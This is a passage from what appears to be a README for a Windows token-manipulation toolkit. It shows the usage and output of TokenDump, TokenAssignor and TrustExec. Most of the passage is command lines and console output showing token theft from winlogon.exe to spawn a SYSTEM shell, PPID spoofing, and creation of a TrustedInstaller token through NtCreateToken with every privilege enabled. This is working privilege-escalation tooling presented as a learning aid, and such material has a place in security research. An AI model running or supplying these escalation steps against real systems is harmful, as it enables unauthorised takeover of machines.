AUTHORITY\\SYSTEM System    Impersonation\n3516 4348       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n3516 4656       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n\n[+] Got 4 thread(s).\n[*] Found 1 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n[*] Done.\n```\n\nTo filter any of these listings by token user name, pass a case-insensitive substring with the `-a` option; `network` below matches `NT AUTHORITY\\NETWORK SERVICE`. The filter applies to the rows only; the account summary at the end still lists every account that was seen:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -a network -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate process token.\n\n PID Session Process Name Token User                   Integrity Restricted AppContainer\n==== ======= ============ ============================ ========= ========== ============\n1932       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n3500       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n2904       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n2504       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n7012       0 msdtc.exe    NT AUTHORITY\\NETWORK SERVICE System    False      False\n7092       0 sppsvc.exe   NT AUTHORITY\\NETWORK SERVICE System    False      False\n1676       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n3584       0 WmiPrvSE.exe NT AUTHORITY\\NETWORK SERVICE System    False      False\n1000       0 svchost.exe  NT AUTHORITY\\NETWORK SERVICE System    False      False\n\n[+] Got 9 token information.\n[*] Found 7 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n    [*] dev22h2\\user\n    [*] NT AUTHORITY\\LOCAL SERVICE\n    [*] NT AUTHORITY\\NETWORK SERVICE\n    [*] Font Driver Host\\UMFD-0\n    [*] Font Driver Host\\UMFD-1\n    [*] Window Manager\\DWM-1\n[*] Done.\n\nC:\\Dev\u003e.\\TokenDump.exe -e -a network -d -H\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to 
enumerate token handles.\n\n[Token Handle(s) - lsass.exe (PID: 768)]\n\nHandle Session Token User                   Integrity Restricted AppContainer Token Type    Impersonation Level\n====== ======= ============================ ========= ========== ============ ============= ===================\n 0x914       0 NT AUTHORITY\\NETWORK SERVICE System    False      False        Impersonation Impersonation\n\n--snip--\n\n[Token Handle(s) - msdtc.exe (PID: 7012)]\n\nHandle Session Token User                   Integrity Restricted AppContainer Token Type Impersonation Level\n====== ======= ============================ ========= ========== ============ ========== ===================\n 0x23C       0 NT AUTHORITY\\NETWORK SERVICE System    False      False        Primary    Anonymous\n\n[+] Got 27 handle(s).\n[*] Found 8 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n    [*] dev22h2\\user\n    [*] Font Driver Host\\UMFD-1\n    [*] Font Driver Host\\UMFD-0\n    [*] NT AUTHORITY\\NETWORK SERVICE\n    [*] Window Manager\\DWM-1\n    [*] NT AUTHORITY\\LOCAL SERVICE\n    [*] NT AUTHORITY\\ANONYMOUS LOGON\n[*] Done.\n```\n\nTo get verbose information for a specific process, set `-s` flag and target PID as `-p` option value:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -s -p 5996\n\n[\u003e] Trying to dump process token information.\n\n[Token Information for StartMenuExperienceHost.exe (PID: 5996)]\n\nImageFilePath       : C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\StartMenuExperienceHost.exe\nCommandLine         : \"C:\\Windows\\SystemApps\\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\\StartMenuExperienceHost.exe\" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca\nToken User          : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nToken Owner         : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nPrimary Group       : dev22h2\\None (SID: 
S-1-5-21-3896868301-3921591151-1374190648-513)\nToken Type          : Primary\nImpersonation Level : Anonymous\nToken ID            : 0x0000000000063D9A\nAuthentication ID   : 0x000000000001DFE5\nOriginal ID         : 0x00000000000003E7\nModified ID         : 0x0000000000063D24\nIntegrity Level     : Low\nProtection Level    : N/A\nSession ID          : 1\nElevation Type      : Limited\nMandatory Policy    : NoWriteUp\nElevated            : False\nAppContainer        : True\nTokenFlags          : VirtualizeAllowed, IsFiltered, LowBox\nAppContainer Name   : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy\nAppContainer SID    : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000\nAppContainer Number : 2\nHas Linked Token    : True\nToken Source        : User32\nToken Source ID     : 0x000000000001DE9D\n\n\n    PRIVILEGES INFORMATION\n    ----------------------\n\n    Privilege Name                State\n    ============================= =========================\n    SeChangeNotifyPrivilege       EnabledByDefault, Enabled\n    SeIncreaseWorkingSetPrivilege Disabled\n\n\n    GROUP INFORMATION\n    -----------------\n\n    Group Name                                                    Attributes\n    ============================================================= =============================================\n    dev22h2\\None                                                  Mandatory, EnabledByDefault, Enabled\n    Everyone                                                      Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Local account and member of Administrators group UseForDenyOnly\n    BUILTIN\\Administrators                                        UseForDenyOnly\n    BUILTIN\\Users                                                 Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled\n    CONSOLE LOGON                                    
             Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Authenticated Users                              Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\This Organization                                Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Local account                                    Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\LogonSessionId_0_122425                          Mandatory, EnabledByDefault, Enabled, LogonId\n    LOCAL                                                         Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled\n    Mandatory Label\\Low Mandatory Level                           Integrity, IntegrityEnabled\n\n\n    APPCONTAINER CAPABILITIES\n    -------------------------\n\n    Capability Name                                                            Flags\n    ========================================================================== =======\n    APPLICATION PACKAGE AUTHORITY\\Your Internet connection                     Enabled\n    APPLICATION PACKAGE AUTHORITY\\Your home or work networks                   Enabled\n    NAMED CAPABILITIES\\PackageQuery                                            Enabled\n    NAMED CAPABILITIES\\ActivitySystem                                          Enabled\n    NAMED CAPABILITIES\\PreviewStore                                            Enabled\n    NAMED CAPABILITIES\\CortanaPermissions                                      Enabled\n    NAMED CAPABILITIES\\AppointmentsSystem                                      Enabled\n    NAMED CAPABILITIES\\TeamEditionExperience                                   Enabled\n    NAMED CAPABILITIES\\ShellExperience                                         Enabled\n    NAMED CAPABILITIES\\PackageContents                                         Enabled\n    NAMED CAPABILITIES\\VisualElementsSystem                                    
Enabled\n    NAMED CAPABILITIES\\UserAccountInformation                                  Enabled\n    NAMED CAPABILITIES\\ActivityData                                            Enabled\n    NAMED CAPABILITIES\\CloudStore                                              Enabled\n    NAMED CAPABILITIES\\TargetedContent                                         Enabled\n    NAMED CAPABILITIES\\StoreAppInstall                                         Enabled\n    NAMED CAPABILITIES\\StoreLicenseManagement                                  Enabled\n    NAMED CAPABILITIES\\CortanaSettings                                         Enabled\n    NAMED CAPABILITIES\\DependencyTarget                                        Enabled\n    NAMED CAPABILITIES\\SearchSettings                                          Enabled\n    NAMED CAPABILITIES\\CellularData                                            Enabled\n    NAMED CAPABILITIES\\WifiData                                                Enabled\n    PACKAGE CAPABILITY\\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled\n    NAMED CAPABILITIES\\AccessoryManager                                        Enabled\n    NAMED CAPABILITIES\\UserAccountInformation                                  Enabled\n\n\n    DACL INFORMATION\n    ----------------\n\n    Account Name                                            Access                      Flags Type\n    ======================================================= =========================== ===== =============\n    dev22h2\\user                                            GenericAll                  None  AccessAllowed\n    NT AUTHORITY\\SYSTEM                                     GenericAll                  None  AccessAllowed\n    NT AUTHORITY\\LogonSessionId_0_122425                    GenericExecute, GenericRead None  AccessAllowed\n    microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll                  None  AccessAllowed\n\n\n    SECURITY ATTRIBUTES INFORMATION\n    
-------------------------------\n\n    [*] WIN://SYSAPPID\n        Flags : None\n        Type  : String\n            Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy\n            Value[0x01] : App\n            Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\n\n    [*] WIN://PKG\n        Flags : None\n        Type  : UInt64\n            Value[0x00] : 0x0000000200000001\n\n    [*] WIN://PKGHOSTID\n        Flags : None\n        Type  : UInt64\n            Value[0x00] : 0x1000000000000001\n\n    [*] TSA://ProcUnique\n        Flags : NonInheritable, Unique\n        Type  : UInt64\n            Value[0x00] : 0x0000000000000041\n            Value[0x01] : 0x0000000000063D9B\n\n\n\n[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]\n\nToken User          : dev22h2\\user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)\nToken Owner         : BUILTIN\\Administrators (SID: S-1-5-32-544)\nPrimary Group       : dev22h2\\None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)\nToken Type          : Impersonation\nImpersonation Level : Identification\nToken ID            : 0x000000000016ECE6\nAuthentication ID   : 0x000000000001DF83\nOriginal ID         : 0x00000000000003E7\nModified ID         : 0x000000000001DFE4\nIntegrity Level     : High\nProtection Level    : N/A\nSession ID          : 1\nElevation Type      : Full\nMandatory Policy    : NoWriteUp, NewProcessMin\nElevated            : True\nAppContainer        : False\nTokenFlags          : NotLow\nToken Source        : User32\nToken Source ID     : 0x000000000001DE9D\n\n\n    PRIVILEGES INFORMATION\n    ----------------------\n\n    Privilege Name                            State\n    ========================================= =========================\n    SeIncreaseQuotaPrivilege                  Disabled\n    SeSecurityPrivilege                       Disabled\n    SeTakeOwnershipPrivilege                  Disabled\n    
SeLoadDriverPrivilege                     Disabled\n    SeSystemProfilePrivilege                  Disabled\n    SeSystemtimePrivilege                     Disabled\n    SeProfileSingleProcessPrivilege           Disabled\n    SeIncreaseBasePriorityPrivilege           Disabled\n    SeCreatePagefilePrivilege                 Disabled\n    SeBackupPrivilege                         Disabled\n    SeRestorePrivilege                        Disabled\n    SeShutdownPrivilege                       Disabled\n    SeDebugPrivilege                          Disabled\n    SeSystemEnvironmentPrivilege              Disabled\n    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled\n    SeRemoteShutdownPrivilege                 Disabled\n    SeUndockPrivilege                         Disabled\n    SeManageVolumePrivilege                   Disabled\n    SeImpersonatePrivilege                    EnabledByDefault, Enabled\n    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled\n    SeIncreaseWorkingSetPrivilege             Disabled\n    SeTimeZonePrivilege                       Disabled\n    SeCreateSymbolicLinkPrivilege             Disabled\n    SeDelegateSessionUserImpersonatePrivilege Disabled\n\n\n    GROUP INFORMATION\n    -----------------\n\n    Group Name                                                    Attributes\n    ============================================================= =============================================\n    dev22h2\\None                                                  Mandatory, EnabledByDefault, Enabled\n    Everyone                                                      Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled\n    BUILTIN\\Administrators                                        Mandatory, EnabledByDefault, Enabled, Owner\n    BUILTIN\\Users                                                 Mandatory, EnabledByDefault, Enabled\n   
 NT AUTHORITY\\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled\n    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Authenticated Users                              Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\This Organization                                Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Local account                                    Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\LogonSessionId_0_122425                          Mandatory, EnabledByDefault, Enabled, LogonId\n    LOCAL                                                         Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled\n    Mandatory Label\\High Mandatory Level                          Integrity, IntegrityEnabled\n\n\n    DACL INFORMATION\n    ----------------\n\n    Account Name                         Access                      Flags Type\n    ==================================== =========================== ===== =============\n    BUILTIN\\Administrators               GenericAll                  None  AccessAllowed\n    NT AUTHORITY\\SYSTEM                  GenericAll                  None  AccessAllowed\n    NT AUTHORITY\\LogonSessionId_0_122425 GenericExecute, GenericRead None  AccessAllowed\n\n\n    SECURITY ATTRIBUTES INFORMATION\n    -------------------------------\n\n    [*] WIN://SYSAPPID\n        Flags : None\n        Type  : String\n            Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy\n            Value[0x01] : App\n            Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\n\n    [*] WIN://PKG\n        Flags : None\n        Type  : UInt64\n            Value[0x00] : 0x0000000200000001\n\n    [*] WIN://PKGHOSTID\n        Flags : None\n        Type  : UInt64\n    
        Value[0x00] : 0x1000000000000001\n\n    [*] TSA://ProcUnique\n        Flags : NonInheritable, Unique\n        Type  : UInt64\n            Value[0x00] : 0x0000000000000041\n            Value[0x01] : 0x0000000000063D9B\n\n\n[*] Done.\n```\n\nIf you set handle value in a specific process as `-v` option and the PID as `-p` option as well as `-s` flag, this tool get verbose information for the handle as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -s -p 7012 -v 0x23C -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to dump token handle information.\n\n[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]\n\nToken User          : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nToken Owner         : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nPrimary Group       : NT AUTHORITY\\NETWORK SERVICE (SID: S-1-5-20)\nToken Type          : Primary\nImpersonation Level : Anonymous\nToken ID            : 0x000000000007DF17\nAuthentication ID   : 0x00000000000003E4\nOriginal ID         : 0x00000000000003E7\nModified ID         : 0x000000000007DEE2\nIntegrity Level     : System\nProtection Level    : N/A\nSession ID          : 0\nElevation Type      : Default\nMandatory Policy    : NoWriteUp, NewProcessMin\nElevated            : False\nAppContainer        : False\nTokenFlags          : IsFiltered, NotLow\nHas Linked Token    : False\nToken Source        : N/A\nToken Source ID     : N/A\n\n\n    PRIVILEGES INFORMATION\n    ----------------------\n\n    Privilege Name          State\n    ======================= =========================\n    SeChangeNotifyPrivilege EnabledByDefault, Enabled\n    SeCreateGlobalPrivilege EnabledByDefault, Enabled\n\n\n    GROUP INFORMATION\n    -----------------\n\n    Group Name                             Attributes\n    ====================================== ====================================================\n    Mandatory Label\\System Mandatory Level Integrity, 
IntegrityEnabled\n    Everyone                               Mandatory, EnabledByDefault, Enabled\n    BUILTIN\\Users                          Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\SERVICE                   Mandatory, EnabledByDefault, Enabled\n    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Authenticated Users       Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\This Organization         Mandatory, EnabledByDefault, Enabled\n    NT SERVICE\\MSDTC                       EnabledByDefault, Enabled, Owner\n    NT AUTHORITY\\LogonSessionId_0_515780   Mandatory, EnabledByDefault, Enabled, Owner, LogonId\n    LOCAL                                  Mandatory, EnabledByDefault, Enabled\n\n\n    DACL INFORMATION\n    ----------------\n\n    Account Name        Access      Flags Type\n    =================== =========== ===== =============\n    NT AUTHORITY\\SYSTEM GenericAll  None  AccessAllowed\n    OWNER RIGHTS        ReadControl None  AccessAllowed\n    NT SERVICE\\MSDTC    GenericAll  None  AccessAllowed\n\n\n    SECURITY ATTRIBUTES INFORMATION\n    -------------------------------\n\n    [*] TSA://ProcUnique\n        Flags : NonInheritable, Unique\n        Type  : UInt64\n            Value[0x00] : 0x0000000000000070\n            Value[0x01] : 0x000000000007DF18\n\n\n[*] Done.\n```\n\nTo investigate impersonate token applied to thread, set the thread ID as `-t` option as follows:\n\n```\nC:\\Dev\u003e.\\TokenDump.exe -e -T -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to enumerate impersonated threads.\n\n PID  TID Session Process Name Token User          Integrity Impersonation Level\n==== ==== ======= ============ =================== ========= ===================\n1952 2000       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n1952 2300       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n3516 4348   
    0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n3516 4656       0 svchost.exe  NT AUTHORITY\\SYSTEM System    Impersonation\n\n[+] Got 4 thread(s).\n[*] Found 1 account(s).\n    [*] NT AUTHORITY\\SYSTEM\n[*] Done.\n\n\nC:\\Dev\u003e.\\TokenDump.exe -s -p 3516 -t 4656 -d\n\n[\u003e] Trying to enable SeDebugPrivilege.\n[+] SeDebugPrivilege is enabled successfully.\n[\u003e] Trying to dump thread token information.\n\n[Token Information for svchost.exe (PID: 3516, TID: 4656)]\n\nToken User          : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nToken Owner         : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nPrimary Group       : NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\nToken Type          : Impersonation\nImpersonation Level : Impersonation\nToken ID            : 0x0000000000038CC4\nAuthentication ID   : 0x00000000000003E7\nOriginal ID         : 0x00000000000003E7\nModified ID         : 0x000000000002CE61\nIntegrity Level     : System\nProtection Level    : N/A\nSession ID          : 0\nElevation Type      : Default\nMandatory Policy    : NoWriteUp, NewProcessMin\nElevated            : True\nAppContainer        : False\nTokenFlags          : IsFiltered, NotLow, EnforceRedirectionTrust\nHas Linked Token    : False\nToken Source        : N/A\nToken Source ID     : N/A\n\n\n    PRIVILEGES INFORMATION\n    ----------------------\n\n    Privilege Name                State\n    ============================= =========================\n    SeAssignPrimaryTokenPrivilege Disabled\n    SeTcbPrivilege                EnabledByDefault, Enabled\n    SeSecurityPrivilege           Disabled\n    SeSystemProfilePrivilege      EnabledByDefault, Enabled\n    SeDebugPrivilege              EnabledByDefault, Enabled\n    SeChangeNotifyPrivilege       EnabledByDefault, Enabled\n    SeImpersonatePrivilege        EnabledByDefault, Enabled\n    SeCreateGlobalPrivilege       EnabledByDefault, Enabled\n\n\n    GROUP INFORMATION\n    -----------------\n\n    Group Name                            
 Attributes\n    ====================================== ====================================================\n    Mandatory Label\\System Mandatory Level Integrity, IntegrityEnabled\n    Everyone                               Mandatory, EnabledByDefault, Enabled\n    BUILTIN\\Users                          Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\SERVICE                   Mandatory, EnabledByDefault, Enabled\n    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\Authenticated Users       Mandatory, EnabledByDefault, Enabled\n    NT AUTHORITY\\This Organization         Mandatory, EnabledByDefault, Enabled\n    NT SERVICE\\DiagTrack                   EnabledByDefault, Enabled, Owner\n    NT AUTHORITY\\LogonSessionId_0_180260   Mandatory, EnabledByDefault, Enabled, Owner, LogonId\n    LOCAL                                  Mandatory, EnabledByDefault, Enabled\n    BUILTIN\\Administrators                 EnabledByDefault, Enabled, Owner\n\n\n    DACL INFORMATION\n    ----------------\n\n    Account Name         Access      Flags Type\n    ==================== =========== ===== =============\n    NT AUTHORITY\\SYSTEM  GenericAll  None  AccessAllowed\n    OWNER RIGHTS         ReadControl None  AccessAllowed\n    NT SERVICE\\DiagTrack GenericAll  None  AccessAllowed\n\n\n    SECURITY ATTRIBUTES INFORMATION\n    -------------------------------\n\n    [*] TSA://ProcUnique\n        Flags : NonInheritable, Unique\n        Type  : UInt64\n            Value[0x00] : 0x0000000000000047\n            Value[0x01] : 0x000000000002C0FA\n\n\n[*] Done.\n```\n\n\n## TokenAssignor\n\n[Back to Top](#privfu)\n\n[Project](./TokenAssignor/)\n\nThis tool is to learh how to assign primary token:\n\n```\nPS C:\\Dev\u003e .\\TokenAssignor.exe\n\nTokenAssignor - Tool to execute token assigned process.\n\nUsage: TokenAssignor.exe [Options]\n\n        -h, --help    : Displays this help message.\n        -c, --command : Specifies a command 
to execute. Default is cmd.exe.\n        -m, --method  : Specifies a method ID (0 - 3).\n        -p, --pid     : Specifies a source PID for token stealing.\n\n[!] -m option is required.\n```\n\nThis tool tries to steal token from a specified process and execute a token assigned process.\nMost of methods require administrative privileges.\nTo execute a token assigned process with `CreateProcessAsUser` API, set `-m` option to `0`:\n\n```\nPS C:\\Dev\u003e Get-Process winlogon\n\nHandles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName\n-------  ------    -----      -----     ------     --  -- -----------\n    270      13     2452      10108       0.33    688   1 winlogon\n\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name            SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 0\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x68).\n[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).\n[+] Impersonation as winlogon.exe is successful.\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 9552).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. 
All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name           SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nWhen set `-m` option to `1`, this tool tries to create a suspended process and update the primary token to a stolen token.\nThis method cannot be used for changing Session ID due to kernel restriction.\nKernel forces token's Session ID to be matched with Session ID for `_EPROCESS`:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name            SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 1\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x2C8).\n[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).\n[+] Impersonation as winlogon.exe is successful.\n[+] Suspended \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 9968).\n[*] Current user of the suspended process is DESKTOP-5OHMOBJ\\user (SID: S-1-5-21-1955100404-698441589-1496171011-1001)\n[+] Primary token for the suspended process is updated successfully.\n[*] Current user of the suspended process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18)\n[*] Resuming the suspended process.\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. 
All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name           SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nIf set `-m` option is set to `2`, creates a new token assigned process with Secondary Logon Service:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name            SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 2\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Got a primary token from PID 688 (Handle = 0x2C4).\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 5832).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\n\nPS C:\\Dev\u003e\n\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name           SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\nIf set `-m` option is set to `3`, creates a new token assigned process with PPID spoofing method:\n\n```\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name            SID\n==================== =============================================\ndesktop-5ohmobj\\user S-1-5-21-1955100404-698441589-1496171011-1001\nPS C:\\Dev\u003e .\\TokenAssignor.exe -p 688 -m 3\n\n[+] SeDebugPrivilege is enabled successfully.\n[+] Got a handle from PID 688 (Handle = 0x2C4).\n[+] Thread attribute is built successfully.\n[+] \"C:\\Windows\\system32\\cmd.exe\" is executed successfully (PID = 4852).\n[*] User of the created process is NT AUTHORITY\\SYSTEM (SID: S-1-5-18).\n\nPS C:\\Dev\u003e\n\n\nMicrosoft Windows [Version 10.0.22631.2428]\n(c) Microsoft Corporation. 
All rights reserved.\n\nC:\\Dev\u003ewhoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name           SID\n=================== ========\nnt authority\\system S-1-5-18\n```\n\n\n## TrustExec\n\n[Back to Top](#privfu)\n\n[Project](./TrustExec)\n\nThis tool is to execute process as `NT SERVICE\\TrustedInstaller` group account.\nOriginal PoC is [Grzegorz Tworek](https://twitter.com/0gtweet)'s [TrustedInstallerCmd2.c](https://github.com/gtworek/PSBits/blob/master/VirtualAccounts/TrustedInstallerCmd2.c).\nI ported it to C# and rebuilt it as a tool.\nMost of operations require administrative privilege (`SeDebugPrivilege`, `SeImpersonatePrivilege` and High Mandatory Level):\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe\n\nTrustExec - Tool to create TrustedInstaller process.\n\nUsage: TrustExec.exe [Options]\n\n        -h, --help        : Displays this help message.\n        -l, --lookup      : Flag to lookup account name or SID.\n        -n, --new-console : Flag to create new console. Use with -x flag.\n        -x, --exec        : Flag to execute command.\n        -a, --account     : Specifies account name to lookup.\n        -c, --command     : Specifies command to execute. Default is cmd.exe.\n        -e, --extra       : Specifies command to execute. Default is cmd.exe.\n        -m, --method      : Specifies method ID. 
Default is 0 (NtCreateToken method).\n        -s, --sid         : Specifies SID to lookup.\n\nAvailable Method IDs:\n\n        + 0 - Leverages NtCreateToken syscall.\n        + 1 - Leverages virtual logon.\n        + 2 - Leverages service logon.\n        + 3 - Leverages S4U logon.\n        + 4 - Leverages TrustedInstaller service.\n```\n\nFor this module, 2 techniques are implemeted.\nWe can specfy a method with `-m` option.\nThe value for `-m` option can be a integer from `0` to `4`.\nFor example, if you set `-m` option to `0`, this tool try to get `TrustedInstaller` token with `NtCreateToken`:\n\n```\nPS C:\\Dev\u003e .\\TrustExec.exe -m 0 -x -c powershell\n\n[*] NtCreateToken syscall method is selected.\n[+] SeDebugPrivilege is enabled successfully.\n[+] SeImpersonatePrivilege is enabled successfully.\n[+] Impersonation as smss.exe is successful.\n[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.\n[+] SeCreateTokenPrivilege is enabled successfully for current thread.\n[+] SeImpersonatePrivilege is enabled successfully for current thread.\n[+] Got a TrustedInstaller token (Handle = 0xE8).\n[+] Got a token assigned process (PID: 2832).\nWindows PowerShell\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nInstall the latest PowerShell for new features and improvements! 
https://aka.ms/PSWindows\n\nPS C:\\Dev\u003e whoami /user\n\nUSER INFORMATION\n----------------\n\nUser Name           SID\n=================== ========\nnt authority\\system S-1-5-18\nPS C:\\Dev\u003e whoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                            Description                                                        State\n========================================= ================================================================== =======\nSeCreateTokenPrivilege                    Create a token object                                              Enabled\nSeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled\nSeLockMemoryPrivilege                     Lock pages in memory                                               Enabled\nSeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled\nSeMachineAccountPrivilege                 Add workstations to domain                                         Enabled\nSeTcbPrivilege                            Act as part of the operating system                                Enabled\nSeSecurityPrivilege                       Manage auditing and security log                                   Enabled\nSeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled\nSeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled\nSeSystemProfilePrivilege                  Profile system performance                                         Enabled\nSeSystemtimePrivilege                     Change the system time                                             Enabled\nSeProfileSingleProcessPrivilege           Profile single process                                             Enabled\nSeIncreaseBasePriorityPrivilege           Increase scheduling priority            
                           Enabled\nSeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled\nSeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled\nSeBackupPrivilege                         Back up files and directories                                      Enabled\nSeRestorePrivilege                        Restore files and directories                                      Enabled\nSeShutdownPrivilege                       Shut down the system                                               Enabled\nSeDebugPrivilege                          Debug programs                                                     Enabled\nSeAuditPrivilege                          Generate security audits                                           Enabled\nSeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled\nSeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled\nSeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled\nSeUndockPrivilege                         Remove computer from docking station                               Enabled\nSeSyncAgentPrivilege                      Synchronize directory service data                                 Enabled\nSeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled\nSeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled\nSeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled\nSeCreateGlobalPrivilege                   Create global objects                                              